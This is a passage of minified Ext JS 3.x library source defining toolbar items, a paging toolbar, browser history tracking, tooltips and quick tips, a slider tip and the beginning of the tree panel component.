this.el = c.createChild({tag:"span", cls:"xtb-sep"}, b)
}});
Ext.reg("tbseparator", a.Separator);
a.Spacer = Ext.extend(a.Item, {onRender:function (c, b) {
this.el = c.createChild({tag:"div", cls:"xtb-spacer", style:this.width ? "width:" + this.width + "px" : ""}, b)
}});
Ext.reg("tbspacer", a.Spacer);
a.Fill = Ext.extend(a.Item, {render:Ext.emptyFn, isFill:true});
Ext.reg("tbfill", a.Fill);
a.TextItem = Ext.extend(a.Item, {constructor:function (b) {
a.TextItem.superclass.constructor.call(this, Ext.isString(b) ? {text:b} : b)
}, onRender:function (c, b) {
this.autoEl = {cls:"xtb-text", html:this.text || ""};
a.TextItem.superclass.onRender.call(this, c, b)
}, setText:function (b) {
if (this.rendered) {
this.el.update(b)
} else {
this.text = b
}
}});
Ext.reg("tbtext", a.TextItem);
a.Button = Ext.extend(Ext.Button, {});
a.SplitButton = Ext.extend(Ext.SplitButton, {});
Ext.reg("tbbutton", a.Button);
Ext.reg("tbsplit", a.SplitButton)
})();
Ext.ButtonGroup = Ext.extend(Ext.Panel, {baseCls:"x-btn-group", layout:"table", defaultType:"button", frame:true, internalDefaults:{removeMode:"container", hideParent:true}, initComponent:function () {
this.layoutConfig = this.layoutConfig || {};
Ext.applyIf(this.layoutConfig, {columns:this.columns});
if (!this.title) {
this.addClass("x-btn-group-notitle")
}
this.on("afterlayout", this.onAfterLayout, this);
Ext.ButtonGroup.superclass.initComponent.call(this)
}, applyDefaults:function (b) {
b = Ext.ButtonGroup.superclass.applyDefaults.call(this, b);
var a = this.internalDefaults;
if (b.events) {
Ext.applyIf(b.initialConfig, a);
Ext.apply(b, a)
} else {
Ext.applyIf(b, a)
}
return b
}, onAfterLayout:function () {
var a = this.body.getFrameWidth("lr") + this.body.dom.firstChild.offsetWidth;
this.body.setWidth(a);
this.el.setWidth(a + this.getFrameWidth())
}});
Ext.reg("buttongroup", Ext.ButtonGroup);
(function () {
var a = Ext.Toolbar;
Ext.PagingToolbar = Ext.extend(Ext.Toolbar, {pageSize:20, displayMsg:"Displaying {0} - {1} of {2}", emptyMsg:"No data to display", beforePageText:"Page", afterPageText:"of {0}", firstText:"First Page", prevText:"Previous Page", nextText:"Next Page", lastText:"Last Page", refreshText:"Refresh", initComponent:function () {
var c = [this.first = new a.Button({tooltip:this.firstText, overflowText:this.firstText, iconCls:"x-tbar-page-first", disabled:true, handler:this.moveFirst, scope:this}), this.prev = new a.Button({tooltip:this.prevText, overflowText:this.prevText, iconCls:"x-tbar-page-prev", disabled:true, handler:this.movePrevious, scope:this}), "-", this.beforePageText, this.inputItem = new Ext.form.NumberField({cls:"x-tbar-page-number", allowDecimals:false, allowNegative:false, enableKeyEvents:true, selectOnFocus:true, submitValue:false, listeners:{scope:this, keydown:this.onPagingKeyDown, blur:this.onPagingBlur}}), this.afterTextItem = new a.TextItem({text:String.format(this.afterPageText, 1)}), "-", this.next = new a.Button({tooltip:this.nextText, overflowText:this.nextText, iconCls:"x-tbar-page-next", disabled:true, handler:this.moveNext, scope:this}), this.last = new a.Button({tooltip:this.lastText, overflowText:this.lastText, iconCls:"x-tbar-page-last", disabled:true, handler:this.moveLast, scope:this}), "-", this.refresh = new a.Button({tooltip:this.refreshText, overflowText:this.refreshText, iconCls:"x-tbar-loading", handler:this.doRefresh, scope:this})];
var b = this.items || this.buttons || [];
if (this.prependButtons) {
this.items = b.concat(c)
} else {
this.items = c.concat(b)
}
delete this.buttons;
if (this.displayInfo) {
this.items.push("->");
this.items.push(this.displayItem = new a.TextItem({}))
}
Ext.PagingToolbar.superclass.initComponent.call(this);
this.addEvents("change", "beforechange");
this.on("afterlayout", this.onFirstLayout, this, {single:true});
this.cursor = 0;
this.bindStore(this.store, true)
}, onFirstLayout:function () {
if (this.dsLoaded) {
this.onLoad.apply(this, this.dsLoaded)
}
}, updateInfo:function () {
if (this.displayItem) {
var b = this.store.getCount();
var c = b == 0 ? this.emptyMsg : String.format(this.displayMsg, this.cursor + 1, this.cursor + b, this.store.getTotalCount());
this.displayItem.setText(c)
}
}, onLoad:function (b, e, j) {
if (!this.rendered) {
this.dsLoaded = [b, e, j];
return
}
var g = this.getParams();
this.cursor = (j.params && j.params[g.start]) ? j.params[g.start] : 0;
var i = this.getPageData(), c = i.activePage, h = i.pages;
this.afterTextItem.setText(String.format(this.afterPageText, i.pages));
this.inputItem.setValue(c);
this.first.setDisabled(c == 1);
this.prev.setDisabled(c == 1);
this.next.setDisabled(c == h);
this.last.setDisabled(c == h);
this.refresh.enable();
this.updateInfo();
this.fireEvent("change", this, i)
}, getPageData:function () {
var b = this.store.getTotalCount();
return{total:b, activePage:Math.ceil((this.cursor + this.pageSize) / this.pageSize), pages:b < this.pageSize ? 1 : Math.ceil(b / this.pageSize)}
}, changePage:function (b) {
this.doLoad(((b - 1) * this.pageSize).constrain(0, this.store.getTotalCount()))
}, onLoadError:function () {
if (!this.rendered) {
return
}
this.refresh.enable()
}, readPage:function (e) {
var b = this.inputItem.getValue(), c;
if (!b || isNaN(c = parseInt(b, 10))) {
this.inputItem.setValue(e.activePage);
return false
}
return c
}, onPagingFocus:function () {
this.inputItem.select()
}, onPagingBlur:function (b) {
this.inputItem.setValue(this.getPageData().activePage)
}, onPagingKeyDown:function (i, h) {
var c = h.getKey(), j = this.getPageData(), g;
if (c == h.RETURN) {
h.stopEvent();
g = this.readPage(j);
if (g !== false) {
g = Math.min(Math.max(1, g), j.pages) - 1;
this.doLoad(g * this.pageSize)
}
} else {
if (c == h.HOME || c == h.END) {
h.stopEvent();
g = c == h.HOME ? 1 : j.pages;
i.setValue(g)
} else {
if (c == h.UP || c == h.PAGEUP || c == h.DOWN || c == h.PAGEDOWN) {
h.stopEvent();
if ((g = this.readPage(j))) {
var b = h.shiftKey ? 10 : 1;
if (c == h.DOWN || c == h.PAGEDOWN) {
b *= -1
}
g += b;
if (g >= 1 & g <= j.pages) {
i.setValue(g)
}
}
}
}
}
}, getParams:function () {
return this.paramNames || this.store.paramNames
}, beforeLoad:function () {
if (this.rendered && this.refresh) {
this.refresh.disable()
}
}, doLoad:function (d) {
var c = {}, b = this.getParams();
c[b.start] = d;
c[b.limit] = this.pageSize;
if (this.fireEvent("beforechange", this, c) !== false) {
this.store.load({params:c})
}
}, moveFirst:function () {
this.doLoad(0)
}, movePrevious:function () {
this.doLoad(Math.max(0, this.cursor - this.pageSize))
}, moveNext:function () {
this.doLoad(this.cursor + this.pageSize)
}, moveLast:function () {
var c = this.store.getTotalCount(), b = c % this.pageSize;
this.doLoad(b ? (c - b) : c - this.pageSize)
}, doRefresh:function () {
this.doLoad(this.cursor)
}, bindStore:function (c, d) {
var b;
if (!d && this.store) {
if (c !== this.store && this.store.autoDestroy) {
this.store.destroy()
} else {
this.store.un("beforeload", this.beforeLoad, this);
this.store.un("load", this.onLoad, this);
this.store.un("exception", this.onLoadError, this)
}
if (!c) {
this.store = null
}
}
if (c) {
c = Ext.StoreMgr.lookup(c);
c.on({scope:this, beforeload:this.beforeLoad, load:this.onLoad, exception:this.onLoadError});
b = true
}
this.store = c;
if (b) {
this.onLoad(c, null, {})
}
}, unbind:function (b) {
this.bindStore(null)
}, bind:function (b) {
this.bindStore(b)
}, onDestroy:function () {
this.bindStore(null);
Ext.PagingToolbar.superclass.onDestroy.call(this)
}})
})();
Ext.reg("paging", Ext.PagingToolbar);
Ext.History = (function () {
var e, c;
var k = false;
var d;
function g() {
var l = location.href, m = l.indexOf("#"), n = m >= 0 ? l.substr(m + 1) : null;
if (Ext.isGecko) {
n = decodeURIComponent(n)
}
return n
}
function a() {
c.value = d
}
function h(l) {
d = l;
Ext.History.fireEvent("change", l)
}
function i(m) {
var l = ['<html><body><div id="state">', Ext.util.Format.htmlEncode(m), "</div></body></html>"].join("");
try {
var o = e.contentWindow.document;
o.open();
o.write(l);
o.close();
return true
} catch (n) {
return false
}
}
function b() {
if (!e.contentWindow || !e.contentWindow.document) {
setTimeout(b, 10);
return
}
var o = e.contentWindow.document;
var m = o.getElementById("state");
var l = m ? m.innerText : null;
var n = g();
setInterval(function () {
o = e.contentWindow.document;
m = o.getElementById("state");
var q = m ? m.innerText : null;
var p = g();
if (q !== l) {
l = q;
h(l);
location.hash = l;
n = l;
a()
} else {
if (p !== n) {
n = p;
i(p)
}
}
}, 50);
k = true;
Ext.History.fireEvent("ready", Ext.History)
}
function j() {
d = c.value ? c.value : g();
if (Ext.isIE) {
b()
} else {
var l = g();
setInterval(function () {
var m = g();
if (m !== l) {
l = m;
h(l);
a()
}
}, 50);
k = true;
Ext.History.fireEvent("ready", Ext.History)
}
}
return{fieldId:"x-history-field", iframeId:"x-history-frame", events:{}, init:function (m, l) {
if (k) {
Ext.callback(m, l, [this]);
return
}
if (!Ext.isReady) {
Ext.onReady(function () {
Ext.History.init(m, l)
});
return
}
c = Ext.getDom(Ext.History.fieldId);
if (Ext.isIE) {
e = Ext.getDom(Ext.History.iframeId)
}
this.addEvents("ready", "change");
if (m) {
this.on("ready", m, l, {single:true})
}
j()
}, add:function (l, m) {
if (m !== false) {
if (this.getToken() == l) {
return true
}
}
if (Ext.isIE) {
return i(l)
} else {
location.hash = l;
return true
}
}, back:function () {
history.go(-1)
}, forward:function () {
history.go(1)
}, getToken:function () {
return k ? d : g()
}}
})();
Ext.apply(Ext.History, new Ext.util.Observable());
Ext.Tip = Ext.extend(Ext.Panel, {minWidth:40, maxWidth:300, shadow:"sides", defaultAlign:"tl-bl?", autoRender:true, quickShowInterval:250, frame:true, hidden:true, baseCls:"x-tip", floating:{shadow:true, shim:true, useDisplay:true, constrain:false}, autoHeight:true, closeAction:"hide", initComponent:function () {
Ext.Tip.superclass.initComponent.call(this);
if (this.closable && !this.title) {
this.elements += ",header"
}
}, afterRender:function () {
Ext.Tip.superclass.afterRender.call(this);
if (this.closable) {
this.addTool({id:"close", handler:this[this.closeAction], scope:this})
}
}, showAt:function (a) {
Ext.Tip.superclass.show.call(this);
if (this.measureWidth !== false && (!this.initialConfig || typeof this.initialConfig.width != "number")) {
this.doAutoWidth()
}
if (this.constrainPosition) {
a = this.el.adjustForConstraints(a)
}
this.setPagePosition(a[0], a[1])
}, doAutoWidth:function (a) {
a = a || 0;
var b = this.body.getTextWidth();
if (this.title) {
b = Math.max(b, this.header.child("span").getTextWidth(this.title))
}
b += this.getFrameWidth() + (this.closable ? 20 : 0) + this.body.getPadding("lr") + a;
this.setWidth(b.constrain(this.minWidth, this.maxWidth));
if (Ext.isIE7 && !this.repainted) {
this.el.repaint();
this.repainted = true
}
}, showBy:function (a, b) {
if (!this.rendered) {
this.render(Ext.getBody())
}
this.showAt(this.el.getAlignToXY(a, b || this.defaultAlign))
}, initDraggable:function () {
this.dd = new Ext.Tip.DD(this, typeof this.draggable == "boolean" ? null : this.draggable);
this.header.addClass("x-tip-draggable")
}});
Ext.reg("tip", Ext.Tip);
Ext.Tip.DD = function (b, a) {
Ext.apply(this, a);
this.tip = b;
Ext.Tip.DD.superclass.constructor.call(this, b.el.id, "WindowDD-" + b.id);
this.setHandleElId(b.header.id);
this.scroll = false
};
Ext.extend(Ext.Tip.DD, Ext.dd.DD, {moveOnly:true, scroll:false, headerOffsets:[100, 25], startDrag:function () {
this.tip.el.disableShadow()
}, endDrag:function (a) {
this.tip.el.enableShadow(true)
}});
Ext.ToolTip = Ext.extend(Ext.Tip, {showDelay:500, hideDelay:200, dismissDelay:5000, trackMouse:false, anchorToTarget:true, anchorOffset:0, targetCounter:0, constrainPosition:false, initComponent:function () {
Ext.ToolTip.superclass.initComponent.call(this);
this.lastActive = new Date();
this.initTarget(this.target);
this.origAnchor = this.anchor
}, onRender:function (b, a) {
Ext.ToolTip.superclass.onRender.call(this, b, a);
this.anchorCls = "x-tip-anchor-" + this.getAnchorPosition();
this.anchorEl = this.el.createChild({cls:"x-tip-anchor " + this.anchorCls})
}, afterRender:function () {
Ext.ToolTip.superclass.afterRender.call(this);
this.anchorEl.setStyle("z-index", this.el.getZIndex() + 1).setVisibilityMode(Ext.Element.DISPLAY)
}, initTarget:function (c) {
var a;
if ((a = Ext.get(c))) {
if (this.target) {
var b = Ext.get(this.target);
this.mun(b, "mouseover", this.onTargetOver, this);
this.mun(b, "mouseout", this.onTargetOut, this);
this.mun(b, "mousemove", this.onMouseMove, this)
}
this.mon(a, {mouseover:this.onTargetOver, mouseout:this.onTargetOut, mousemove:this.onMouseMove, scope:this});
this.target = a
}
if (this.anchor) {
this.anchorTarget = this.target
}
}, onMouseMove:function (b) {
var a = this.delegate ? b.getTarget(this.delegate) : this.triggerElement = true;
if (a) {
this.targetXY = b.getXY();
if (a === this.triggerElement) {
if (!this.hidden && this.trackMouse) {
this.setPagePosition(this.getTargetXY())
}
} else {
this.hide();
this.lastActive = new Date(0);
this.onTargetOver(b)
}
} else {
if (!this.closable && this.isVisible()) {
this.hide()
}
}
}, getTargetXY:function () {
if (this.delegate) {
this.anchorTarget = this.triggerElement
}
if (this.anchor) {
this.targetCounter++;
var c = this.getOffsets(), l = (this.anchorToTarget && !this.trackMouse) ? this.el.getAlignToXY(this.anchorTarget, this.getAnchorAlign()) : this.targetXY, a = Ext.lib.Dom.getViewWidth() - 5, h = Ext.lib.Dom.getViewHeight() - 5, i = document.documentElement, e = document.body, k = (i.scrollLeft || e.scrollLeft || 0) + 5, j = (i.scrollTop || e.scrollTop || 0) + 5, b = [l[0] + c[0], l[1] + c[1]], g = this.getSize();
this.anchorEl.removeClass(this.anchorCls);
if (this.targetCounter < 2) {
if (b[0] < k) {
if (this.anchorToTarget) {
this.defaultAlign = "l-r";
if (this.mouseOffset) {
this.mouseOffset[0] *= -1
}
}
this.anchor = "left";
return this.getTargetXY()
}
if (b[0] + g.width > a) {
if (this.anchorToTarget) {
this.defaultAlign = "r-l";
if (this.mouseOffset) {
this.mouseOffset[0] *= -1
}
}
this.anchor = "right";
return this.getTargetXY()
}
if (b[1] < j) {
if (this.anchorToTarget) {
this.defaultAlign = "t-b";
if (this.mouseOffset) {
this.mouseOffset[1] *= -1
}
}
this.anchor = "top";
return this.getTargetXY()
}
if (b[1] + g.height > h) {
if (this.anchorToTarget) {
this.defaultAlign = "b-t";
if (this.mouseOffset) {
this.mouseOffset[1] *= -1
}
}
this.anchor = "bottom";
return this.getTargetXY()
}
}
this.anchorCls = "x-tip-anchor-" + this.getAnchorPosition();
this.anchorEl.addClass(this.anchorCls);
this.targetCounter = 0;
return b
} else {
var d = this.getMouseOffset();
return[this.targetXY[0] + d[0], this.targetXY[1] + d[1]]
}
}, getMouseOffset:function () {
var a = this.anchor ? [0, 0] : [15, 18];
if (this.mouseOffset) {
a[0] += this.mouseOffset[0];
a[1] += this.mouseOffset[1]
}
return a
}, getAnchorPosition:function () {
if (this.anchor) {
this.tipAnchor = this.anchor.charAt(0)
} else {
var a = this.defaultAlign.match(/^([a-z]+)-([a-z]+)(\?)?$/);
if (!a) {
throw"AnchorTip.defaultAlign is invalid"
}
this.tipAnchor = a[1].charAt(0)
}
switch (this.tipAnchor) {
case"t":
return"top";
case"b":
return"bottom";
case"r":
return"right"
}
return"left"
}, getAnchorAlign:function () {
switch (this.anchor) {
case"top":
return"tl-bl";
case"left":
return"tl-tr";
case"right":
return"tr-tl";
default:
return"bl-tl"
}
}, getOffsets:function () {
var b, a = this.getAnchorPosition().charAt(0);
if (this.anchorToTarget && !this.trackMouse) {
switch (a) {
case"t":
b = [0, 9];
break;
case"b":
b = [0, -13];
break;
case"r":
b = [-13, 0];
break;
default:
b = [9, 0];
break
}
} else {
switch (a) {
case"t":
b = [-15 - this.anchorOffset, 30];
break;
case"b":
b = [-19 - this.anchorOffset, -13 - this.el.dom.offsetHeight];
break;
case"r":
b = [-15 - this.el.dom.offsetWidth, -13 - this.anchorOffset];
break;
default:
b = [25, -13 - this.anchorOffset];
break
}
}
var c = this.getMouseOffset();
b[0] += c[0];
b[1] += c[1];
return b
}, onTargetOver:function (b) {
if (this.disabled || b.within(this.target.dom, true)) {
return
}
var a = b.getTarget(this.delegate);
if (a) {
this.triggerElement = a;
this.clearTimer("hide");
this.targetXY = b.getXY();
this.delayShow()
}
}, delayShow:function () {
if (this.hidden && !this.showTimer) {
if (this.lastActive.getElapsed() < this.quickShowInterval) {
this.show()
} else {
this.showTimer = this.show.defer(this.showDelay, this)
}
} else {
if (!this.hidden && this.autoHide !== false) {
this.show()
}
}
}, onTargetOut:function (a) {
if (this.disabled || a.within(this.target.dom, true)) {
return
}
this.clearTimer("show");
if (this.autoHide !== false) {
this.delayHide()
}
}, delayHide:function () {
if (!this.hidden && !this.hideTimer) {
this.hideTimer = this.hide.defer(this.hideDelay, this)
}
}, hide:function () {
this.clearTimer("dismiss");
this.lastActive = new Date();
if (this.anchorEl) {
this.anchorEl.hide()
}
Ext.ToolTip.superclass.hide.call(this);
delete this.triggerElement
}, show:function () {
if (this.anchor) {
this.showAt([-1000, -1000]);
this.origConstrainPosition = this.constrainPosition;
this.constrainPosition = false;
this.anchor = this.origAnchor
}
this.showAt(this.getTargetXY());
if (this.anchor) {
this.anchorEl.show();
this.syncAnchor();
this.constrainPosition = this.origConstrainPosition
} else {
this.anchorEl.hide()
}
}, showAt:function (a) {
this.lastActive = new Date();
this.clearTimers();
Ext.ToolTip.superclass.showAt.call(this, a);
if (this.dismissDelay && this.autoHide !== false) {
this.dismissTimer = this.hide.defer(this.dismissDelay, this)
}
if (this.anchor && !this.anchorEl.isVisible()) {
this.syncAnchor();
this.anchorEl.show()
} else {
this.anchorEl.hide()
}
}, syncAnchor:function () {
var a, b, c;
switch (this.tipAnchor.charAt(0)) {
case"t":
a = "b";
b = "tl";
c = [20 + this.anchorOffset, 2];
break;
case"r":
a = "l";
b = "tr";
c = [-2, 11 + this.anchorOffset];
break;
case"b":
a = "t";
b = "bl";
c = [20 + this.anchorOffset, -2];
break;
default:
a = "r";
b = "tl";
c = [2, 11 + this.anchorOffset];
break
}
this.anchorEl.alignTo(this.el, a + "-" + b, c)
}, setPagePosition:function (a, b) {
Ext.ToolTip.superclass.setPagePosition.call(this, a, b);
if (this.anchor) {
this.syncAnchor()
}
}, clearTimer:function (a) {
a = a + "Timer";
clearTimeout(this[a]);
delete this[a]
}, clearTimers:function () {
this.clearTimer("show");
this.clearTimer("dismiss");
this.clearTimer("hide")
}, onShow:function () {
Ext.ToolTip.superclass.onShow.call(this);
Ext.getDoc().on("mousedown", this.onDocMouseDown, this)
}, onHide:function () {
Ext.ToolTip.superclass.onHide.call(this);
Ext.getDoc().un("mousedown", this.onDocMouseDown, this)
}, onDocMouseDown:function (a) {
if (this.autoHide !== true && !this.closable && !a.within(this.el.dom)) {
this.disable();
this.doEnable.defer(100, this)
}
}, doEnable:function () {
if (!this.isDestroyed) {
this.enable()
}
}, onDisable:function () {
this.clearTimers();
this.hide()
}, adjustPosition:function (a, d) {
if (this.constrainPosition) {
var c = this.targetXY[1], b = this.getSize().height;
if (d <= c && (d + b) >= c) {
d = c - b - 5
}
}
return{x:a, y:d}
}, beforeDestroy:function () {
this.clearTimers();
Ext.destroy(this.anchorEl);
delete this.anchorEl;
delete this.target;
delete this.anchorTarget;
delete this.triggerElement;
Ext.ToolTip.superclass.beforeDestroy.call(this)
}, onDestroy:function () {
Ext.getDoc().un("mousedown", this.onDocMouseDown, this);
Ext.ToolTip.superclass.onDestroy.call(this)
}});
Ext.reg("tooltip", Ext.ToolTip);
Ext.QuickTip = Ext.extend(Ext.ToolTip, {interceptTitles:false, tagConfig:{namespace:"ext", attribute:"qtip", width:"qwidth", target:"target", title:"qtitle", hide:"hide", cls:"qclass", align:"qalign", anchor:"anchor"}, initComponent:function () {
this.target = this.target || Ext.getDoc();
this.targets = this.targets || {};
Ext.QuickTip.superclass.initComponent.call(this)
}, register:function (e) {
var h = Ext.isArray(e) ? e : arguments;
for (var g = 0, a = h.length; g < a; g++) {
var l = h[g];
var k = l.target;
if (k) {
if (Ext.isArray(k)) {
for (var d = 0, b = k.length; d < b; d++) {
this.targets[Ext.id(k[d])] = l
}
} else {
this.targets[Ext.id(k)] = l
}
}
}
}, unregister:function (a) {
delete this.targets[Ext.id(a)]
}, cancelShow:function (b) {
var a = this.activeTarget;
b = Ext.get(b).dom;
if (this.isVisible()) {
if (a && a.el == b) {
this.hide()
}
} else {
if (a && a.el == b) {
this.clearTimer("show")
}
}
}, getTipCfg:function (d) {
var b = d.getTarget(), c, a;
if (this.interceptTitles && b.title && Ext.isString(b.title)) {
c = b.title;
b.qtip = c;
b.removeAttribute("title");
d.preventDefault()
} else {
a = this.tagConfig;
c = b.qtip || Ext.fly(b).getAttribute(a.attribute, a.namespace)
}
return c
}, onTargetOver:function (i) {
if (this.disabled) {
return
}
this.targetXY = i.getXY();
var c = i.getTarget();
if (!c || c.nodeType !== 1 || c == document || c == document.body) {
return
}
if (this.activeTarget && ((c == this.activeTarget.el) || Ext.fly(this.activeTarget.el).contains(c))) {
this.clearTimer("hide");
this.show();
return
}
if (c && this.targets[c.id]) {
this.activeTarget = this.targets[c.id];
this.activeTarget.el = c;
this.anchor = this.activeTarget.anchor;
if (this.anchor) {
this.anchorTarget = c
}
this.delayShow();
return
}
var g, h = Ext.fly(c), b = this.tagConfig, d = b.namespace;
if (g = this.getTipCfg(i)) {
var a = h.getAttribute(b.hide, d);
this.activeTarget = {el:c, text:g, width:h.getAttribute(b.width, d), autoHide:a != "user" && a !== "false", title:h.getAttribute(b.title, d), cls:h.getAttribute(b.cls, d), align:h.getAttribute(b.align, d)};
this.anchor = h.getAttribute(b.anchor, d);
if (this.anchor) {
this.anchorTarget = c
}
this.delayShow()
}
}, onTargetOut:function (a) {
if (this.activeTarget && a.within(this.activeTarget.el) && !this.getTipCfg(a)) {
return
}
this.clearTimer("show");
if (this.autoHide !== false) {
this.delayHide()
}
}, showAt:function (b) {
var a = this.activeTarget;
if (a) {
if (!this.rendered) {
this.render(Ext.getBody());
this.activeTarget = a
}
if (a.width) {
this.setWidth(a.width);
this.body.setWidth(this.adjustBodyWidth(a.width - this.getFrameWidth()));
this.measureWidth = false
} else {
this.measureWidth = true
}
this.setTitle(a.title || "");
this.body.update(a.text);
this.autoHide = a.autoHide;
this.dismissDelay = a.dismissDelay || this.dismissDelay;
if (this.lastCls) {
this.el.removeClass(this.lastCls);
delete this.lastCls
}
if (a.cls) {
this.el.addClass(a.cls);
this.lastCls = a.cls
}
if (this.anchor) {
this.constrainPosition = false
} else {
if (a.align) {
b = this.el.getAlignToXY(a.el, a.align);
this.constrainPosition = false
} else {
this.constrainPosition = true
}
}
}
Ext.QuickTip.superclass.showAt.call(this, b)
}, hide:function () {
delete this.activeTarget;
Ext.QuickTip.superclass.hide.call(this)
}});
Ext.reg("quicktip", Ext.QuickTip);
Ext.QuickTips = function () {
var b, a = false;
return{init:function (c) {
if (!b) {
if (!Ext.isReady) {
Ext.onReady(function () {
Ext.QuickTips.init(c)
});
return
}
b = new Ext.QuickTip({elements:"header,body", disabled:a});
if (c !== false) {
b.render(Ext.getBody())
}
}
}, ddDisable:function () {
if (b && !a) {
b.disable()
}
}, ddEnable:function () {
if (b && !a) {
b.enable()
}
}, enable:function () {
if (b) {
b.enable()
}
a = false
}, disable:function () {
if (b) {
b.disable()
}
a = true
}, isEnabled:function () {
return b !== undefined && !b.disabled
}, getQuickTip:function () {
return b
}, register:function () {
b.register.apply(b, arguments)
}, unregister:function () {
b.unregister.apply(b, arguments)
}, tips:function () {
b.register.apply(b, arguments)
}}
}();
Ext.slider.Tip = Ext.extend(Ext.Tip, {minWidth:10, offsets:[0, -10], init:function (a) {
a.on({scope:this, dragstart:this.onSlide, drag:this.onSlide, dragend:this.hide, destroy:this.destroy})
}, onSlide:function (b, c, a) {
this.show();
this.body.update(this.getText(a));
this.doAutoWidth();
this.el.alignTo(a.el, "b-t?", this.offsets)
}, getText:function (a) {
return String(a.value)
}});
Ext.ux.SliderTip = Ext.slider.Tip;
Ext.tree.TreePanel = Ext.extend(Ext.Panel, {rootVisible:true, animate:Ext.enableFx, lines:true, enableDD:false, hlDrop:Ext.enableFx, pathSeparator:"/", bubbleEvents:[], initComponent:function () {
Ext.tree.TreePanel.superclass.initComponent.call(this);
if (!this.eventModel) {
this.eventModel = new Ext.tree.TreeEventModel(this)
}
var a = this.loader;
if (!a) {
a = new Ext.tree.TreeLoader({dataUrl:this.dataUrl, requestMethod:this.requestMethod})
} else {
if (Ext.isObject(a) && !a.load) {
a = new Ext.tree.TreeLoader(a)
}
}
this.loader = a;
this.nodeHash = {};
if (this.root) {
var b = this.root;
delete this.root;
this.setRootNode(b)
}
this.addEvents("append", "remove", "movenode", "insert", "beforeappend", "beforeremove", "beforemovenode", "beforeinsert", "beforeload", "load", "textchange", "beforeexpandnode", "beforecollapsenode", "expandnode", "disabledchange", "collapsenode", "beforeclick", "click", "containerclick", "checkchange", "beforedblclick", "dblclick", "containerdblclick", "contextmenu", "containercontextmenu", "beforechildrenrendered", "startdrag", "enddrag", "dragdrop", "beforenodedrop", "nodedrop", "nodedragover");
if (this.singleExpand) {
this.on("beforeexpandnode", this.restrictExpand, this)
}
}, proxyNodeEvent:function (c, b, a, h, g, e, d) {
if (c == "collapse" || c == "expand" || c == "beforecollapse" || c == "beforeexpand" || c == "move" || c == "beforemove") {
c = c + "node"
}
return this.fireEvent(c, b, a, h, g, e, d)
}, getRootNode:function () {
return this.root
}, setRootNode:function (b) {
this.destroyRoot();
if (!b.render) {
b = this.loader.createNode(b)
}
this.root = b;
b.ownerTree = this;
b.isRoot = true;
this.registerNode(b);
if (!this.rootVisible) {
var a = b.attributes.uiProvider;
b.ui = a ? new a(b) : new Ext.tree.RootTreeNodeUI(b)
}
if (this.innerCt) {
this.clearInnerCt();
this.renderRoot()
}
return b
}, clearInnerCt:function () {
this.innerCt.update("")
}, renderRoot:function () {
this.root.render();
if (!this.rootVisible) {
this.root.renderChildren()
}
}, getNodeById:function (a) {
return this.nodeHash[a]
}, registerNode:function (a) {
this.nodeHash[a.id] = a
}, unregisterNode:function (a) {
delete this.nodeHash[a.id]
}, toString:function () {
return"[Tree" + (this.id ? " " + this.id : "") + "]"
}, restrictExpand:function (a) {
var b = a.parentNode;
if (b) {
if (b.expandedChild && b.expandedChild.parentNode == b) {
b.expandedChild.collapse()
}
b.expandedChild = a
}
}, getChecked:function (b, c) {
c = c || this.root;
var d = [];
var e = function () {
if (this.attributes.checked) {
d.push(!b ? this : (b == "id" ? this.id : this.attributes[b]))
}
};
c.cascade(e);
return d
}, getLoader:function () {
return this.loader
}, expandAll:function () {
this.root.expand(true)
}, collapseAll:function () {
this.root.collapse(true)
}, getSelectionModel:function () {
if (!this.selModel) {
this.selModel = new Ext.tree.DefaultSelectionModel()
}
return this.selModel
}, expandPath:function (g, a, h) {
if (Ext.isEmpty(g)) {
if (h) {
h(false, undefined)
}
return
}
a = a || "id";
var d = g.split(this.pathSeparator);
var c = this.root;
if (c.attributes[a] != d[1]) {
if (h) {
h(false, null)
}
return
}
var b = 1;
var e = function () {
if (++b == d.length) {
if (h) {
h(true, c)
}
return
}
var i = c.findChild(a, d[b]);
if (!i) {
if (h) {
h(false, c)
}
return
}
c = i;
i.expand(false, false, e)
};
c.expand(false, false, e)
}, selectPath:function (e, a, g) {
if (Ext.isEmpty(e)) {
if (g) {
g(false, undefined)
}
return
}
a = a || "id";
var c = e.split(this.pathSeparator), b = c.pop();
if (c.length > 1) {
var d = function (i, h) {
if (i && h) {
var j = h.findChild(a, b);
if (j) {
j.select();
if (g) {
g(true, j)
}
} else {
if (g) {
g(false, j)
}
}
} else {
if (g) {
g(false, j)
}
}
};
this.expandPath(c.join(this.pathSeparator), a, d)
} else {
this.root.select();
if (g) {
g(true, this.root)
}
}
}, getTreeEl:function () {
return this.body
}, onRender:function (b, a) {
Ext.tree.TreePanel.superclass.onRender.call(this, b, a);
this.el.addClass("x-tree");
this.innerCt = this.body.createChild({tag:"ul", cls:"x-tree-root-ct " + (this.useArrows ? "x-tree-arrows" : this.lines ? "x-tree-lines" : "x-tree-no-lines")})
}, initEvents:function () {
Ext.tree.TreePanel.superclass.initEvents.call(this);
if (this.containerScroll) {
Ext.dd.ScrollManager.register(this.body)
}
if ((this.enableDD || this.enableDrop) && !this.dropZone) {
this.dropZone = new Ext.tree.TreeDropZone(this, this.dropConfig || {ddGroup:this.ddGroup || "TreeDD", appendOnly:this.ddAppendOnly === true})
}
if ((this.enableDD || this.enableDrag) && !this.dragZone) {
this.dragZone = new Ext.tree.TreeDragZone(this, this.dragConfig || {ddGroup:this.ddGroup || "TreeDD", scroll:this.ddScroll})
}
this.getSelectionModel().init(this)
}, afterRender:function () {
Ext.tree.TreePanel.superclass.afterRender.call(this);
this.renderRoot()
}, beforeDestroy:function () {
if (this.rendered) {
Ext.dd.ScrollManager.unregister(this.body);
Ext.destroy(this.dropZone, this.dragZone)
}
this.destroyRoot();
Ext.destroy(this.loader);
this.nodeHash = this.root = this.loader = null;
Ext.tree.TreePanel.superclass.beforeDestroy.call(this)
}, destroyRoot:function () {
if (this.root && this.root.destroy) {
this.root.destroy(true)
}
}});
Ext.tree.TreePanel.nodeTypes = {};
Ext.reg("treepanel", Ext.tree.TreePanel);
Ext.tree.TreeEventModel = function (a) {
this.tree = a;
this.tree.on("render", this.initEvents, this)
};
Ext.tree.TreeEventModel.prototype = {initEvents:function () {
var a = this.tree;
if (a.trackMouseOver !== false) {
a.mon(a.innerCt, {scope:this, mouseover:this.delegateOver, mouseout:this.delegateOut})
}
a.mon(a.getTreeEl(), {scope:this, click:this.delegateClick, dblclick:this.delegateDblClick, contextmenu:this.delegateContextMenu})
}, getNode:function (b) {
var a;
if (a = b.getTarget(".x-tree-node-el", 10)) {
